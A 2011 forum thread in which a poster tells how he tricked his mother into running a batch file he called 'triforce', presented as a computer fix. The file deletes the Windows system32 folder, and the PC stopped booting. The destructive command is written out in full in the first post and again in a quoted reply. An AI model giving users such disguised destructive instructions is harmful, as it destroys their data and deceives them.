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My Parents are Trollbait

Ars Diaboli
Patrick Star
12 posters

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1My Parents are Trollbait Empty My Parents are Trollbait 2011-08-28, 01:12



So my parents were complaining that another issue occurred on their PC. For Christ sake they're running 32-bit Vista on a Dell, it's asking for trouble. They asked me again to fix this problem. So I wrote down the following instructions because I was so annoyed:

You need to triforce your computer. In order to do this you need to do the following:

1-Open up Notepad

2-Type the following:

@echo off
del c:\WINDOWS\system32

3-Save as "all files" under the name triforce.bat

4-Double click the .bat file you made and you'll triforce your computer.

My dad would have thought something a bit fishy with my instructions. My mother, however, found this particular note first. I had no expectation that they would follow through because I had left notes for them in the past on how to fix their computer and they always made me do it in the end. So, my mom followed the instructions and actually did it. This was followed by a lot of freaking out by her because she didn't understand why her computer would only POST and not start Vista. Needless to say, I enjoyed quite a laugh. Razz

2My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:14



Somehow I doubt your mum saw the humour in that.

And now im tempted to see what that does for myself.

3My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:25



So basically... your parents asked for your help and you were a total dick to them? scratch

4My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:31



Metalzoic wrote:So basically... your parents asked for your help and you were a total dick to them? scratch

No, they're beyond asking for help. They always are telling me how their computer is moving so slow and they have all these problems and the hard drive (which they refer to as memory) is almost full and I always tell them the same thing. "Your computer is 5 years old. Unless you want to order hardware there's not much I can do."

Usually I run a quick disc clean-up and index the hard drive to speed it up a little. This is a quick fix but it inevitably slows down again in a few days.

5My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:31



Pranks =/= being a dick. I know how it feels to be the only tech-savvy person in a household. I only wish I had the wit and creativity to do something like that.

6My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:32



Plus, it's all good now. I just ran the Windows start-up recovery disc which fixed the problem. It was funny seeing their reactions though. Razz

7My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:35

Patrick Star

Patrick Star

my grand parents do the same thing but with the T.V. Remote My Parents are Trollbait 2458268739

8My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:37



What's so ironic is my mom's dad (my grandpa, duh) is super tech-savvy like me and he builds his own systems as well. I wonder what he'll think of this one.

9My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 01:39

Ars Diaboli

Ars Diaboli wrote:they're running 32-bit Vista


Just do them a favor and install them XP, if they can't support Windows 7.

10My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 03:30



eeewwwww vista

11My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 03:35



ThePeavstenator wrote:So my parents were complaining that another issue occurred on their PC. For Christ sake they're running 32-bit Vista on a Dell, it's asking for trouble. They asked me again to fix this problem. So I wrote down the following instructions because I was so annoyed:

You need to triforce your computer. In order to do this you need to do the following:

1-Open up Notepad

2-Type the following:

@echo off
del c:\WINDOWS\system32

3-Save as "all files" under the name triforce.bat

4-Double click the .bat file you made and you'll triforce your computer.

My dad would have thought something a bit fishy with my instructions. My mother, however, found this particular note first. I had no expectation that they would follow through because I had left notes for them in the past on how to fix their computer and they always made me do it in the end. So, my mom followed the instructions and actually did it. This was followed by a lot of freaking out by her because she didn't understand why her computer would only POST and not start Vista. Needless to say, I enjoyed quite a laugh. Razz

My Parents are Trollbait Sm%20wtf%20is%20this%20nerd%20shit


my 70 year old neighbors payed me $20 to "set up" their new printer....

I think i plugged it in, and clicked "accept" on some sort of software installation a few times and then was done in about 2 minutes.

12My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 03:38



My Parents are Trollbait Tumblr_lh7qlqf06l1qd9z3y

13My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 13:05


Oh gawd my mom still blames me for breaking her laptop. Pretty much the comp was pretty old and on it's last legs so she told me after she downloaded a new flashplayer it freaked out i don't know she probably downloaded other crap.

So i do a system restore for a few hours back and i take the comp off it's charger because i had to move to my room. my mom tells me to watch out because it dies fast. 3 minutes later it shuts off and refuses to turn back on and all i get is a "WELL I TOLD YOU IT WOULD DIE FAST THANKS FOR BREAKING MY COMP" wtf....

14My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 13:35



Y so mean

15My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 19:03



My Parents are Trollbait Bab7dfaba692

My parents are in the bottom set.

16My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 20:09

Honey Badger

Honey Badger

I always have to do the tech shit around my house too. Its annoying as fucking hell. If it wasnt for me spending my own money we wouldnt have a router :l

17My Parents are Trollbait Empty Re: My Parents are Trollbait 2011-08-28, 21:41



Unicorn farts dont run the internet?

But yeah

My whole family is like that you get Aunts and uncles ringing up all the time with the principal "Hey Freds doing an I.T degree he can fix our shit for freeeeeeeeee!"

Mind you my parents do the same to my Electrician cousin so it evens out in some Karmic sort of way i suppose

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